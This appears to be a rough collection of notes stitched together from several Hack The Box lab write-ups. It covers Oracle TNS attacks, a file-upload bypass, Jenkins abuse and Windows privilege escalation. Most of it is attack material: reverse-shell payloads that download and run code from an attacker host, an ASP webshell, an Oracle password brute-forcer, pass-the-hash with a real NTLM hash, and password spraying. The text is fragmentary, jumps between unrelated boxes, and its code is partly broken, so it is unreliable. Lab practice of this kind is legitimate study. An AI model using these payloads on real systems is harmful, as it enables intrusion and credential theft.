for changing the shellcode msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Invoke-PowershellTcp copy this file from /opt/nishang/shells to /smb directory
this line put in to end of the file Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
This will make it so that not only does the module load, but then the shell is called to give me a callback.
run this commmand on the webshell then it get from attacker python server and then give shell to attacker machine powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')
I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.
Notice that port 80 - Microsoft IIS httpd 8.5 is opened. Just note it down, it will be useful later on. Let’s focus on port 1521 (and sort of port 49160) instead - Oracle TNS listener 11.2.0.2.0 (unauthorized). Doing some enumeration I find out that this particular version of Oracle listener is vulnerable to remote TNS poisoning.
Exploitation Creating your own privileged users
sqlplus scott/[email protected](DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=10.10.10.82)(Port=1521))(CONNECT_DATA=(SID=XE))) AS SYSDBA CREATE USER v3ded IDENTIFIED BY v3ded99; GRANT dba TO v3ded;
gobuster -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html -t 30 - for dir hunting
Oracle db - Port 1521 - port open we need odat tool setup now find sid 1 - Identify SIDs
odat sidguesser -s 10.10.10.82 - sidguesser
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc' So at this point we have four potential SIDs: ‘XE’, ‘XEXDB’, ‘PLSExtProc’, and ‘CLRExtProc’.
3 - Guess / bruteforce user and pass
So I wrote a brute force script in python, using threads, can go pretty quick:
!/usr/bin/env python
import cx_Oracle import sys from multiprocessing import Pool
MAX_PROC = 50 host = "10.10.10.82" sid = "XE"
def usage(): print("{} [ip] [wordlist]".format(sys.argv[0])) print(" wordlist should be of the format [username]:[password]") sys.exit(1)
def scan(userpass): u, p = userpass.split(':')[:2] try: conn = cxOracle.connect('{user}/{pass}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid)) return u, p, True except cx_Oracle.DatabaseError: return u, p, False
def main(host, userpassfile, nprocs=MAX_PROC): with open(userpassfile, 'r') as f: userpass = f.read().rstrip().replace('\r','').split('\n')
1
pool = Pool(processes=nprocs)
2
3
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
select * from user_role_privs; sqlplus SCOTT/[email protected]:1521/XE as sysdba Similarly with odat, running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
This means that we can likely use RottenPotato (or LonelyPotato).
First, we’ll upload two files to the server. MSFRottenPotato.exe and rev.bat. The exe is from Decoder’s GitHub page for lonelypotato. The second is a simple powershell command to get a shell:
Bounty was one of the easier boxes I’ve done on HTB, but it still showcased a neat trick for initial access that involved embedding ASP code in a web.config file that wasn’t subject to file extension filtering. Initial shell provides access as an unprivileged user on a relatively unpatched host, vulnerable to several kernel exploits, as well as a token privilege attack. I’ll show a handful of ways to enumerate and to escalate privilege, including a really neat new tool, Watson. When I first wrote this post, Watson wouldn’t run on Bounty, but thanks to some quick work from Rasta Mouse and Mark S, I was able to update the post to include it.
nmap -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.93 80 port open
/transfer.aspx presents a simple form with “Browse…” and “Upload” buttons:
Bypassing Upload Extension Filter I’ll grab a copy of the aspx shell that comes with kali, and try to upload it. On first attempt to upload, the page rejects it:
I can bypass the filter by adding a null byte after our aspx so that the app thinks it’s a jpg, but then saves it as an aspx:
Prep It’s certainly possible to get a webshell, but I’ll notice that the UploadedFiles path is being cleared out every few minutes. So I’ll opt to go directly to reverse shell. First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. Then add a line at the end to invoke a callback to me:
Visit http://10.10.10.93/UploadedFiles/web.config, which runs the asp code, which invokes PowerShell to download the Nishang shell, and then run it creating a connection back to me:
user.txt
Now with shell, I can grab user.txt. Strangely, it’s not present when I look for it: It turns out that the file is there, it’s just hidden.
If I re-run Get-ChildItem (or gci or ls) with the -Force flag, it shows up:
gci -force
Privesc: merlin –> SYSTEM Enumeration
I’ve got a bunch of different methods here, but if you’re only going to read on, jump ahead to Watson, as it’s brand new, and my favorite.
System Info systeminfo Whoami /priv
Whenever I get access via a web service on a Windows host, I always check whoami /priv. If SeImpersonatePrivilege is present,
I can likely get SYSTEM with Lonely Potato. That appears to be the case here: SeImpersonatePrivilege Impersonate a client after authentication Enabled whoami /priv
Sherlock Another tool to try is Sherlock. Unfortunately, it’s no longer being maintained, in favor of Watson (see more on that later).
Still, it’s a quick PowerShell Script that will identify some kernel exploits. Upload it, and then run
Find-AllVulns.
It looks like MS10-092 is a good candidate:
Watson : check the version details:
\windows\microsoft.net\framework\v2.0.50727\msbuild -version So build again with .NET Framework 2.0, copy it over to Bounty, and run it: 2.0 version create a watson.exe and run it into the machine
Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges
use post/multi/recon/local_exploit_suggester Now get and run PowerShell launcher from my Nishang shell: iex(new-object net.webclient).downloadstring('http://10.10.14.5/met-445.ps1')
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %>
msfvenom: Payload generator & encoder. -p windows/x64/meterpreter/reverse_tcp: Sets the payload as a x64 meterpreter reverse shell. LHOST=10.10.14.251: Sets the “listening” host to our own IP. LPORT=4321: Sets the “listening” port to a port of our choice. -f exe: Sets the payload output format as an exe. -a x64: Specifies the system architecture as x64. -o payload.exe: Sets our output payload name to be “payload.exe”. — platform windows: Specifies the victim’s platform as windows (not necessary), as this is automatically inferred from the payload AFAIK).
manual enumerate users for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done
-a - Process a binary file as if it were text. -o - Print only the matched (non-empty) parts of a matching line -E - Interpret PATTERNS as extended regular expressions
Enumerating Users –> Shell as Chase –> User Flag So far we have hazard and rout3r as potential usernames and stealth1agent, [email protected], Q4)sJu\Y8qz*A3?d as potential passwords.
smbclient --list //heist.htb/ -U 'hazard'
impacket to enumerate other users /opt/impacket/examples/lookupsid.py hazard:[email protected]
Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d:
Whenever I encounter an application that error message that looks fairly unique, I always copy & paste the error message into Google and see what happens. This technique is very underrated, google that shit.
Powered by Jetty 9.4
We are seeing quite a few results for Jenkins, so there is a high probability that this server is running Jenkins as a service, and now we just have to discover it.
Dirbuster Next step is to dirbuster everything to discover the jenkins dashboard path. I always use the directory-list-2.3-medium.txt which comes default in kali for most HTB boxes.
It looks like /askjeves/ seems to be the correct path for the Jenkins main dashboard, confirming our suspicions that Jenkins is the running service.
Exploiting Jenkins
Method 1: Jenkins Script Console
Jenkins has a scripting console, which you can access by going to Manage Jenkins => Script Console
You can write scripts in the Groovy Scripting Language. I searched for groovy script run command example or if you just want to skip straight to the shell search groovy script reverse shell
Testing to see if we have code execution…
1
def sout = new StringBuffer(), serr = new StringBuffer()
From my search of groovy script reverse shell, I came across this Github gist – change the host and port parameter to match your settings, and hit “Run” in the script console & you will get a reverse shell.
With Jenkins you can execute system commands as part of a deployment build job. The Jenkins server allowed anyone to do anything even to the anonymous user which means we can create a malicious deployment & execute our code.
Steps:
1
Steps:
2
3
Create new Build Job (http://10.10.10.63:50000/askjeeves/view/all/newJob)
4
Select “FreeStyle Project’
5
Hit Ok
6
Select “Build Enviroment”
7
Generate payload / put the code you want to execute as a build step
8
Hit Apply
9
Start Build
10
You can run any system commands you want in the predeployment step, I used a msfvenom payload just to validate that it’s possible.
It looks like this machine is vulnerable two a few LPE exploits the big ones being MS16-075 (RottenPotato) & MS16-032. From our sysinfo output we can rule out MS16-032 because that particular exploit requires two cpu(s), and this machine has only one cpu.
It looks like this machine is vulnerable to MS16-075 (which I would say is fairly reliable when available), and from our eariler whoami /all command it seems we have everything in place to successfully execute this exploit.
1
MS16-075 Windows smb server
2
MS16-032 - Security update for secondary logon to address elevation of privilege
Copied!
1
Method 1: MS16-075 “RottenPotato”
Copied!
The steps to successfully exploit MS16-075 “rotten potato” (with meterpreter) is:
1
Have meterpreter shell
2
Upload RottenPotato/potato exploit executeable
3
Load ignognito on meterpreter session
4
Execute rottenpotato executable
5
Impersonate NT Authority/SYSTEM token
6
You are now system.
Copied!
Powershell 1-liner for download + executing file (getting meterpreter shell):
If you searched through the user kohsuke documents directory you would discover a file called CEH.kbdx. Normally the .kbdx file extension is associated with the KeePass Password Safe. If we can crack the password on this vault file, we will likely find credentials to potentially the local administrator account.
Downloading the Keepass Database file with meterpreter download CEH.kdbx
verifying the downloaded file [email protected]:~/htb/jeeves# file CEH.kdbx
Before we can crack the CEH.kbdx we need to convert it to a format that either john or hashcat can understand. We can use the tool keepass2john (comes preinstalled on kali) to do this.
keepass2john CEH.kdbx
cracking the hash & getting the password of the vault with john john --wordlist=/usr/share/wordlists/rockyou.txt CEH.hash
Here are the contents that were contained in the keepass database file.
We have a few passwords & and a hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 which happens to be an NTLM hash. The SMB Service (Port 445) is exposed on this server, so we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.
crackmapexec smb ip -u Administrator -p ceh_db_passwords.txt --lusers
crackmapexec smb ip -u administrator -H ceh_db_hash.txt --lusers
Shell with Metasploit PSEXEC Module & Hash With a valid hash of the administrator account, we can perform a pass-the-hash attack & compromise the machine. I chose to use Metasploit for this, but there are plenty of tools which do the same thing as this module.
1
Getting SYSTEM shell with msf psexec
2
use exploit/windows/smb/psexec
3
exploit done with hash
4
Getting the “Hidden” root.txt
Copied!
dir /a
dir /R That hm.txt:root.txt:$DATA means that the file root.txt is inside an alternate data stream inside hm.txt
You can see the contents of an ADS stream a few different ways but the simplist way in my opinion is using the more command on windows…
more < hm.txt:root.txt
blog 2nd
search -f *.kdbx /exploit/windows/smb/psexec
chose to use the simple pth-winexe program, shown below. Metasploit's exploit/windows/smb/psexec module is also an option.
john --format="keepass" --wordlist=/usr/share/wordlists/rockyou.txt hash.txt pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
Keepas password manager Doing a bit of roaming around the file system, I find an interesting .kdbx file. This file extension is associated with Keepass password manager. The mentiond .kdbx file can be found at C:\Users\kohsuke\Documents\CEH.kdbx. To transfer this file into our computer I first put netcat binary (in Kali: /usr/share/windows-binaries/nc.exe) onto the Windows system via Powershell:
powershell -c 'Invoke-WebRequest "http://IP/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"' Note: Don’t forget to start a web server before you actually try to download a file.
Thanks to netcat, we are able to transfer the .kdbx file into our filesystem. We can then proceed to generate a hash with keepass2john.